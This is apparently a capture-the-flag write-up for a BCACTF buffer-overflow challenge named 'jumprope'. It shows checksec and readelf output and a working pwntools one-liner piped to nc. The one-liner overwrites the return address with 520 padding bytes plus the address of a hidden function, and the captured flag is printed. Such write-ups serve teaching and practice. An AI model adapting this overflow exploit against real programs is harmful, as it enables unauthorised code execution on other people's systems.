   RELRO:    Partial RELRO  
   Stack:    No canary found  
   NX:       NX enabled  
   PIE:      No PIE (0x400000)

Then, use readelf to get the address of the function.

$ readelf -s jumprope | grep FUNC
   64: 00000000004010d0    47 FUNC    GLOBAL DEFAULT   15 _start  
   65: 00000000004011b6   102 FUNC    GLOBAL DEFAULT   15 a  
   67: 000000000040125a   109 FUNC    GLOBAL DEFAULT   15 main  
   68: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fopen@@GLIBC_2.2.5  
   70: 0000000000401000     0 FUNC    GLOBAL HIDDEN    12 _init

(readelf -s prints all the symbols (functions, global variables, etc) and grep FUNC only prints functions from that list)

Then, we can send the address of the function, along with an offset that was found by guessing and checking to the binary. In Python, sys.stdout.buffer.write is how you can print raw bytes (print only prints UTF-8 strings, which can cause issues for values such as the 0 byte, which isn’t a valid UTF-8 character). I spent a while debugging my exploit on the remote server, to realize that I didn’t include a b"\n" when using the write function, which print sends by default.

python -c 'from pwn import *; import sys; write = sys.stdout.buffer.write; write(b"A"*520 + p64(0x00000000004011b6) + b"\n")' | nc bin.bcactf.com 49177  
Here at BCA, fitness is one of our biggest priorities!  
Today's workout is going to be jumproping. Enjoy!  
  
Better start jumping!  
Woo, that was quite the workout wasn't it!  
bcactf{buff3r_0v3rfl0w_f4nct10n_j4mps_NfEgj4hg}

Part 2 - the hard ones coming soon…